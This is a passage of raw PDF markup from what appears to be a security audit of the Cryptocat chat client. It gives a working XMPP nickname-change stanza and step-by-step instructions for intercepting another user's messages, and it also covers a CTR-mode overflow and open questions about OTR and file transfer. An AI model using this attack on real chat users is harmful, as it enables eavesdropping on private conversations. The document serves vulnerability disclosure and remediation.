Tw 12 TL /F2 10 Tf 0 0 0 rg (Feasibility: ) Tj /F1 10 Tf (This attack requires only sending the victim $Alice$ an ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (presence message indicating a) Tj T* 0 Tw .41784 Tw (nickname change. An ) Tj /F3 10 Tf (XMPP-BOSH ) Tj /F1 10 Tf (server $operating over ) Tj /F3 10 Tf (TLS ) Tj /F1 10 Tf (or not$ will typically relay such messages) Tj T* 0 Tw .889269 Tw (without modification, and we have verified that the production ) Tj /F3 10 Tf (crypto.cat ) Tj /F1 10 Tf (service does so. Therefore, the) Tj T* 0 Tw (attack can be performed by any client that knows the conversation name.) Tj T* ET Q Q q 1 0 0 1 62.69291 411.0236 cm q BT 1 0 0 1 0 14 Tm .852126 Tw 12 TL /F2 10 Tf 0 0 0 rg (Verification: ) Tj /F1 10 Tf (This issue was verified by source code analysis and by experimentation. See ) Tj 0 0 .501961 rg (Appendix C:) Tj T* 0 Tw (Exploit Code for Issue G) Tj 0 0 0 rg (.) Tj T* ET Q Q q 1 0 0 1 62.69291 369.0236 cm q BT 1 0 0 1 0 26 Tm 1.965814 Tw 12 TL /F2 10 Tf 0 0 0 rg (Implementation Analysis:) Tj /F1 10 Tf ( ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (clients do not support changing their nickname once logged in.) Tj T* 0 Tw .798443 Tw (However, the ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (protocol does support this functionality. A "nickname-change message" is a special) Tj T* 0 Tw (case of an ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (presence message using status code 303, such as:) Tj T* ET Q Q q 1 0 0 1 62.69291 291.2833 cm q q .952737 0 0 .952737 0 0 cm q 1 0 0 1 6.6 6.927412 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 492 72 re B* Q q BT 1 0 0 1 0 50 Tm 12 TL /F4 10 Tf 0 0 0 rg (<) Tj (presence xmlns="jabber:client" from="ccaudittest@conference.crypto.cat/mallory") Tj T* ( to="2716478293139059658259042@crypto.cat/854194958139059658455998") Tj (>) Tj T* ( ) Tj (<) Tj (status code="303") Tj (>) Tj (<) Tj (/status) Tj (>) Tj T* ( ) Tj (<) Tj (item nick="bob") Tj (>) Tj (<) Tj (/item) Tj (>) Tj T* (<) Tj (/presence) Tj (>) Tj T* ET Q Q Q Q Q q 1 0 0 1 62.69291 187.2833 cm q BT 1 0 0 1 0 86 Tm 1.486412 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (code has a ) Tj /F4 10 Tf (changeNickname ) Tj /F1 10 Tf (function that is intended to respond to such messages,) Tj T* 0 Tw .708735 Tw (indicating changes of nickname by other ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (clients. This function has an exploitable flaw: it does not) Tj T* 0 Tw .978935 Tw (verify that the new nickname is not already being used. So if Mallory starts a chat with the victim Alice,) Tj T* 0 Tw 1.912651 Tw (and then changes his nickname in that chat to Bob, then the Alice) Tj /F6 10 Tf 12 TL (\253) Tj /F1 10 Tf 12 TL (Mallory connection replaces the) Tj T* 0 Tw 1.397674 Tw (Alice) Tj /F6 10 Tf 12 TL (\253) Tj /F1 10 Tf 12 TL (Bob connection, overwriting its keys. However, due to an implementation detail of the message) Tj T* 0 Tw 3.51998 Tw (handling code explained below, the callbacks for the replaced connection still reference Mallory's) Tj T* 0 Tw 1.764269 Tw (nickname. Therefore, further messages sent by Alice to Bob are actually $conveniently for the attack$) Tj T* 0 Tw (relayed to Mallory.) Tj T* ET Q Q q 1 0 0 1 62.69291 85.28329 cm q BT 1 0 0 1 0 86 Tm 1.928651 Tw 12 TL /F1 10 Tf 0 0 0 rg (The reason why the message callbacks still reference Mallory's nickname is that they close over the) Tj T* 0 Tw .063059 Tw (original nickname when created, and ) Tj /F4 10 Tf (changeNickname ) Tj /F1 10 Tf (does not affect these closures. For example, the) Tj T* 0 Tw 1.810976 Tw (handler function created by ) Tj /F4 10 Tf (otrIncomingCallback$buddy$ ) Tj /F1 10 Tf (at line 130 of ) Tj /F4 10 Tf (cryptocat.js ) Tj /F1 10 Tf (closes) Tj T* 0 Tw 2.769984 Tw (over the ) Tj /F4 10 Tf (buddy ) Tj /F1 10 Tf (argument in its lexical scope, which is always the original nickname; similarly for) Tj T* 0 Tw .622126 Tw /F4 10 Tf (otrOutgoingCallback$buddy$ ) Tj /F1 10 Tf (at line 142. In the case of the outgoing callback, this helps the attack) Tj T* 0 Tw .732927 Tw (by routing messages to Mallory. In the case of the incoming callback, it hinders the attack by preventing) Tj T* 0 Tw 1.795318 Tw (Mallory from sending messages to Alice that would be interpreted as coming from Bob; instead such) Tj T* 0 Tw (messages would be added to the Alice) Tj /F6 10 Tf 12 TL (\253) Tj /F1 10 Tf 12 TL (Mallory chat, which no longer exists.) Tj T* ET Q Q endstream endobj % 'R193': class PDFStream 193 0 obj % page stream << /Length 3857 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 729.0236 cm q BT 1 0 0 1 0 26 Tm 1.771654 Tw 12 TL /F1 10 Tf 0 0 0 rg (The bug of closure over the original nickname has other effects in the UI, leading us to suspect that) Tj T* 0 Tw 1.082126 Tw /F4 10 Tf (changeNickname ) Tj /F1 10 Tf (has never been tested. We have verified that the following procedure is sufficient to) Tj T* 0 Tw (work around these effects to reproduce the attack:) Tj T* ET Q Q q 1 0 0 1 62.69291 723.0236 cm Q q 1 0 0 1 62.69291 723.0236 cm Q q 1 0 0 1 62.69291 711.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (1.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Mallory starts a chat with Alice as normal.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 705.0236 cm Q q 1 0 0 1 62.69291 633.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 57 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (2.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 62 Tm /F1 10 Tf 12 TL .79528 Tw (Mallory shows the "Display Info" window for Alice, or simulates the effects of doing so. This step is) Tj T* 0 Tw .185318 Tw (needed to avoid an incidental bug that is triggered when the nickname change occurs before Mallory) Tj T* 0 Tw .069431 Tw (has sent any message in the Alice) Tj /F6 10 Tf 12 TL (\253) Tj /F1 10 Tf 12 TL (Mallory chat. It also has the effect of causing the buddy entry for) Tj T* 0 Tw .034983 Tw (Mallory to disappear "cleanly" in Alice's user interface when the nickname change occurs \227 whereas) Tj T* 0 Tw .87186 Tw (if Mallory sent a message, Alice would receive a flashing notification in her buddy entry for Mallory) Tj T* 0 Tw (that would not disappear immediately.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 627.0236 cm Q q 1 0 0 1 62.69291 555.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 57 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (3.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 62 Tm 1.788555 Tw 12 TL /F1 10 Tf 0 0 0 rg (Mallory sends a nickname-change message to the server using the code in ) Tj 0 0 .501961 rg (Appendix C: Exploit) Tj T* 0 Tw .973672 Tw (Code for Issue G) Tj 0 0 0 rg (. The ) Tj /F4 10 Tf (to ) Tj /F1 10 Tf (field of this message is given by his own ) Tj /F3 10 Tf (JID ) Tj /F1 10 Tf (ending in ) Tj /F4 10 Tf (/mallory) Tj /F1 10 Tf (, the) Tj T* 0 Tw 4.536647 Tw (status code is ) Tj /F4 10 Tf (<) Tj (status) Tj ( ) Tj (code="303"/) Tj (>) Tj /F1 10 Tf (, and the new nickname ) Tj /F4 10 Tf (bob ) Tj /F1 10 Tf (is specified using) Tj T* 0 Tw 1.615697 Tw /F4 10 Tf (<) Tj (item) Tj ( ) Tj (nick="bob"/) Tj (>) Tj /F1 10 Tf (. Note that Mallory appears to be sending a message to himself, but the) Tj T* 0 Tw .944692 Tw /F4 10 Tf (to= ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (from= ) Tj /F1 10 Tf (fields get swapped $we do not know why$, and so Alice receives a message with) Tj T* 0 Tw /F4 10 Tf (from= ) Tj /F1 10 Tf (field ending in ) Tj /F4 10 Tf (/mallory ) Tj /F1 10 Tf (as required.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 549.0236 cm Q q 1 0 0 1 62.69291 537.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (4.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Mallory now receives Alice's messages to Bob exactly as though they had been sent to him.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 537.0236 cm Q q 1 0 0 1 62.69291 519.0236 cm q BT 1 0 0 1 0 2 Tm 12 TL /F2 10 Tf 0 0 0 rg (Suggested Remediation: ) Tj /F1 10 Tf (Remove the ) Tj /F4 10 Tf (changeNickname ) Tj /F1 10 Tf (handler.) Tj T* ET Q Q q 1 0 0 1 62.69291 519.0236 cm Q endstream endobj % 'R194': class PDFStream 194 0 obj % page stream << /Length 1407 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 747.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Issues Without Known Exploits) Tj T* ET Q Q q 1 0 0 1 62.69291 705.0236 cm q BT 1 0 0 1 0 26 Tm .953735 Tw 12 TL /F1 10 Tf 0 0 0 rg (This section describes issues for which we have not discovered an exploit in the current ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (use.) Tj T* 0 Tw 2.11152 Tw (These issues could become exploitable when other code changes, so they represent some potential) Tj T* 0 Tw (future security risk.) Tj T* ET Q Q q 1 0 0 1 62.69291 678.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (CTR-mode Overflow) Tj T* ET Q Q q 1 0 0 1 62.69291 624.0236 cm q BT 1 0 0 1 0 38 Tm .156412 Tw 12 TL /F1 10 Tf 0 0 0 rg (The CTR mode implementation in ) Tj /F4 10 Tf (mode-ctr.js ) Tj /F1 10 Tf (fails to carry when the increment of the least-significant) Tj T* 0 Tw 1.508555 Tw (word overflows. This means a re-used counter and confidentiality leak for messages longer than 2^32) Tj T* 0 Tw .621751 Tw (blocks, which is 2^36 bytes for ) Tj /F3 10 Tf (AES) Tj /F1 10 Tf (, with its 16-byte blocks. This is not exploitable in ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (because) Tj T* 0 Tw (message lengths are always shorter than this. $The file transfer chunk size is \(2^16 - 1025$ bytes.\)) Tj T* ET Q Q q 1 0 0 1 62.69291 624.0236 cm Q endstream endobj % 'R195': class PDFStream 195 0 obj % page stream << /Length 6570 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 744.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Future Work) Tj T* ET Q Q q 1 0 0 1 62.69291 714.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Protocol Analysis, Design, and Implementation) Tj T* ET Q Q q 1 0 0 1 62.69291 672.0236 cm q BT 1 0 0 1 0 26 Tm 3.311412 Tw 12 TL /F3 10 Tf 0 0 0 rg (Cryptocat ) Tj /F1 10 Tf (is pushing the boundaries of ) Tj /F3 10 Tf (usable, secure, and multiparty ) Tj /F1 10 Tf (messaging. By dint of this) Tj T* 0 Tw 2.043555 Tw (innovative niche, it would benefit as much or more from security-aware protocol analysis and design) Tj T* 0 Tw (collaboration as it does from code auditing and penetration testing.) Tj T* ET Q Q q 1 0 0 1 62.69291 645.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (Multiparty Chat) Tj T* ET Q Q q 1 0 0 1 62.69291 603.0236 cm q BT 1 0 0 1 0 26 Tm 1.904651 Tw 12 TL /F1 10 Tf 0 0 0 rg (A key area of unresolved issues is the group-chat protocol design and related security features. The) Tj T* 0 Tw 2.71229 Tw (current ) Tj /F3 10 Tf (multiparty chat protocol ) Tj /F1 10 Tf (is an in-house design and would benefit from protocol specification) Tj T* 0 Tw (refinement, design analysis, and potential design changes.) Tj T* ET Q Q q 1 0 0 1 62.69291 561.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.089269 Tw (In terms of product engineering, our intuition is that replacing this protocol with a community-developed) Tj T* 0 Tw .432485 Tw (standard will lead to better security in less time. This of course depends on such a community-developed) Tj T* 0 Tw (standard emerging.) Tj T* ET Q Q q 1 0 0 1 62.69291 471.0236 cm q BT 1 0 0 1 0 74 Tm 2.032485 Tw 12 TL /F1 10 Tf 0 0 0 rg (Unless a community standard emerges very quickly, it is still valuable to improve the security of the) Tj T* 0 Tw .448443 Tw /F3 10 Tf (multiparty chat protocol) Tj /F1 10 Tf (, and we recommend this general roadmap: First, review the existing specification) Tj T* 0 Tw 1.643314 Tw (to empirically determine which security properties it provides, noting ambiguity when present. Second,) Tj T* 0 Tw .905984 Tw (rewrite the specification to follow from those properties $in contrast to describing the procedures or data) Tj T* 0 Tw .719984 Tw (formats$. Third, separate out the procedures and data formats from the abstract protocol and its security) Tj T* 0 Tw 2.761235 Tw (goals. At this point solicit more scrutiny from the community. This work can also contribute to the) Tj T* 0 Tw (development of the community standard alluded to above.) Tj T* ET Q Q q 1 0 0 1 62.69291 444.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (File Transfer) Tj T* ET Q Q q 1 0 0 1 62.69291 390.0236 cm q BT 1 0 0 1 0 38 Tm 3.096136 Tw 12 TL /F1 10 Tf 0 0 0 rg (Like the ) Tj /F3 10 Tf (multiparty chat protocol) Tj /F1 10 Tf (, the file-transfer features of ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (are developed in-house as) Tj T* 0 Tw .241163 Tw (integrated extensions to both ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (and ) Tj /F3 10 Tf (OTR) Tj /F1 10 Tf (. We suggest that file transfer not be reenabled until a more) Tj T* 0 Tw .609318 Tw (secure protocol is available; our suggestions for such a protocol are described in ) Tj 0 0 .501961 rg (Remediation for Issues) Tj T* 0 Tw (A and B) Tj 0 0 0 rg (.) Tj T* ET Q Q q 1 0 0 1 62.69291 363.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (OTR & Cryptographic Libraries) Tj T* ET Q Q q 1 0 0 1 62.69291 321.0236 cm q BT 1 0 0 1 0 26 Tm 1.239318 Tw 12 TL /F1 10 Tf 0 0 0 rg (This audit did not focus on the ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (implementation, nor the cryptographic libraries used by ) Tj /F3 10 Tf (Cryptocat) Tj /F1 10 Tf (.) Tj T* 0 Tw 1.514597 Tw (While we examined these dependencies as necessary for our investigations, these would benefit from) Tj T* 0 Tw (focused, targeted audits.) Tj T* ET Q Q q 1 0 0 1 62.69291 294.0236 cm q BT 1 0 0 1 0 2.5 Tm 15 TL /F5 12.5 Tf 0 0 0 rg (JavaScript Cryptography) Tj T* ET Q Q q 1 0 0 1 62.69291 252.0236 cm q BT 1 0 0 1 0 26 Tm 2.336647 Tw 12 TL /F1 10 Tf 0 0 0 rg (There are open unresolved issues with respect to ) Tj /F3 10 Tf (JavaScript) Tj /F1 10 Tf (-based security applications. These are) Tj T* 0 Tw .536651 Tw (probably more relevant for security research rather than security audit work, but sometimes the lines can) Tj T* 0 Tw (be blurry.) Tj T* ET Q Q q 1 0 0 1 62.69291 222.0236 cm q BT 1 0 0 1 0 14 Tm 2.121412 Tw 12 TL /F1 10 Tf 0 0 0 rg (Two areas which concern us are delivery and verification of the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (add-on, and side-channel) Tj T* 0 Tw (analysis.) Tj T* ET Q Q q 1 0 0 1 62.69291 192.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Open Questions & Concerns) Tj T* ET Q Q q 1 0 0 1 62.69291 180.0236 cm Q q 1 0 0 1 62.69291 180.0236 cm Q q 1 0 0 1 62.69291 156.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .225366 Tw (Conversations with guessable room names can be "burst-in-on". Does the documentation say to use) Tj T* 0 Tw (unguessable room names? $Note that room names are always known to the server.$) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 150.0236 cm Q q 1 0 0 1 62.69291 90.02362 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 45 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 50 Tm 2.039318 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (protocol appears to allow an attacker to force messages to be selectively dropped. It) Tj T* 0 Tw 3.59229 Tw (protects against message reordering, but forcing a message to be dropped will not prevent) Tj T* 0 Tw 1.191412 Tw (subsequent messages from the same buddy from getting though, and will not cause any warning.) Tj T* 0 Tw 21.19247 Tw (Verification: reading the ) Tj 0 0 .501961 rg (OTR v3 protocol specification) Tj 0 0 0 rg (, and the) Tj T* 0 Tw /F4 10 Tf ($ctr) Tj ( ) Tj (<) Tj (=) Tj ( ) Tj (sessKeys.rcv_counter$ ) Tj /F1 10 Tf (check in the ) Tj /F4 10 Tf (handleDataMsg ) Tj /F1 10 Tf (function from ) Tj /F4 10 Tf (otr.js) Tj /F1 10 Tf (.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 90.02362 cm Q q 1 0 0 1 62.69291 84.02362 cm Q q 1 0 0 1 62.69291 84.02362 cm Q endstream endobj % 'R196': class PDFStream 196 0 obj % page stream << /Length 10985 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 741.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .323672 Tw 12 TL /F1 10 Tf 0 0 0 rg (We did not check for the possibility of downgrade attacks to ) Tj /F3 10 Tf (OTR v2) Tj /F1 10 Tf (. $Both OTR v2 and OTR v3 are) Tj T* 0 Tw (enabled by default, and this default is not overridden by Cryptocat.$) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 735.0236 cm Q q 1 0 0 1 62.69291 711.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .139985 Tw (We tried to determine whether an attacker exploiting issue F could also prevent the notification in the) Tj T* 0 Tw (main conversation window, but were not able to establish whether or not that was possible.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 705.0236 cm Q q 1 0 0 1 62.69291 681.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 3.373555 Tw 12 TL /F1 10 Tf 0 0 0 rg (There may be the potential for inconsistent state between the user interface and the global) Tj T* 0 Tw /F4 10 Tf (currentConversation ) Tj /F1 10 Tf (variable if there is an exception in ) Tj /F4 10 Tf (switchConversation) Tj /F1 10 Tf (.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 675.0236 cm Q q 1 0 0 1 62.69291 615.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 45 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 50 Tm 1.448976 Tw 12 TL /F1 10 Tf 0 0 0 rg (\223Major new feature: ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (now automatically reconnects to conversations when disconnected,) Tj T* 0 Tw .651647 Tw (without troubling the user. ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (will automatically detect accidental disconnections and wait for) Tj T* 0 Tw 1.837976 Tw (the Internet connection to be re-established before reconnecting.\224 $from ) Tj 0 0 .501961 rg (CHANGELOG.md) Tj 0 0 0 rg ($ Does) Tj T* 0 Tw .802765 Tw (that mean it is now possible for an attacker to edit out parts of a conversation without troubling the) Tj T* 0 Tw (user?) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 615.0236 cm Q q 1 0 0 1 62.69291 609.0236 cm Q q 1 0 0 1 62.69291 609.0236 cm Q q 1 0 0 1 62.69291 537.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 57 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 62 Tm 1.080574 Tw 12 TL /F1 10 Tf 0 0 0 rg (Question: If the ) Tj /F3 10 Tf (IV ) Tj /F1 10 Tf (parameter passed to the ) Tj /F4 10 Tf (crypto-js ) Tj /F1 10 Tf (library has the wrong type or is not long) Tj T* 0 Tw 1.504976 Tw (enough, ) Tj /F4 10 Tf (undefined ) Tj /F1 10 Tf (propagation could compromise confidentiality. What happens if a non-Array) Tj T* 0 Tw .000514 Tw (general object is passed as ) Tj /F3 10 Tf (IV) Tj /F1 10 Tf (? What happens if a short Array is passed? We suspect this could be a) Tj T* 0 Tw 1.330751 Tw (disastrous, silent security failure. We manually inspected every call site, and performed some live) Tj T* 0 Tw .164104 Tw (tests with assertions within ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (proper to gain confidence that the ) Tj /F3 10 Tf (IV ) Tj /F1 10 Tf (is the right type, size, and) Tj T* 0 Tw (has the correct element types and range.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 531.0236 cm Q q 1 0 0 1 62.69291 507.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .964976 Tw 12 TL /F1 10 Tf 0 0 0 rg (Concern: There is a type-dependent return from ) Tj /F4 10 Tf (Cryptocat.getBytes ) Tj /F1 10 Tf (which actually causes) Tj T* 0 Tw (calls to ) Tj /F4 10 Tf (Cryptocat.encodedBytes$1,) Tj ( ) Tj (...$ ) Tj /F1 10 Tf (to throw an exception.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 501.0236 cm Q q 1 0 0 1 62.69291 459.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 27 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 15 cm q BT 1 0 0 1 0 14 Tm 2.121797 Tw 12 TL /F1 10 Tf 0 0 0 rg (Concern: ) Tj /F4 10 Tf (Cryptocat.fileKeys[nickname] ) Tj /F1 10 Tf (is used for transfers in both directions. Is this a) Tj T* 0 Tw (problem?) Tj T* ET Q Q q 1 0 0 1 23 9 cm Q q 1 0 0 1 23 9 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (What happens if Alice begins receiving $FILE from Bob, then initiates a send to Bob?) Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 453.0236 cm Q q 1 0 0 1 62.69291 429.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .689982 Tw 12 TL /F4 10 Tf 0 0 0 rg (.position) Tj ( ) Tj (>) Tj ( ) Tj (.file.size ) Tj /F1 10 Tf (seems off-by-one $if ) Tj /F4 10 Tf (position ) Tj /F1 10 Tf (= ) Tj /F4 10 Tf (.file.size ) Tj /F1 10 Tf (then the file has all) Tj T* 0 Tw (been sent already$) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 423.0236 cm Q q 1 0 0 1 62.69291 375.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 33 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 38 Tm .980751 Tw 12 TL /F1 10 Tf 0 0 0 rg (Why does it use ) Tj /F4 10 Tf (FileReader ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (readAsDataURL) Tj /F1 10 Tf (? This should be documented in a comment.) Tj T* 0 Tw 1.432619 Tw ($My guess: the data is in a string of Unicode chars and needs to be converted to a sequence of) Tj T* 0 Tw 1.424985 Tw (bytes, and the Unicode-encoding way of doing it is inefficient on chunks this large.$ Why not use) Tj T* 0 Tw /F4 10 Tf (readAsArrayBuffer) Tj /F1 10 Tf (?) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 369.0236 cm Q q 1 0 0 1 62.69291 345.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .598221 Tw 12 TL /F4 10 Tf 0 0 0 rg (otr.js ) Tj /F1 10 Tf (ignores the ) Tj /F3 10 Tf (OTR TLV ) Tj /F1 10 Tf (type 8 4-byte type indicator and assumes it is a filename. This might) Tj T* 0 Tw (break compatibility with a future ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (standard.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 339.0236 cm Q q 1 0 0 1 62.69291 279.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 45 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 50 Tm .633318 Tw 12 TL /F1 10 Tf 0 0 0 rg (Why are only certain types $) Tj /F3 10 Tf (MIME ) Tj /F1 10 Tf (types$ of files allowed? This should be documented, for example) Tj T* 0 Tw .64832 Tw (on a web page, wiki, or text file, and the code that enforces that restriction should have a comment) Tj T* 0 Tw 22.29442 Tw (saying where to find the documentation of it. Perhaps in) Tj T* 0 Tw 2.619921 Tw 0 0 .501961 rg (https://github.com/cryptocat/cryptocat/wiki/OTR-Encrypted-File-Transfer-Specification) Tj 0 0 0 rg (, or perhaps a) Tj T* 0 Tw (more user-focused manual.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 273.0236 cm Q q 1 0 0 1 62.69291 261.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F4 10 Tf 0 0 0 rg 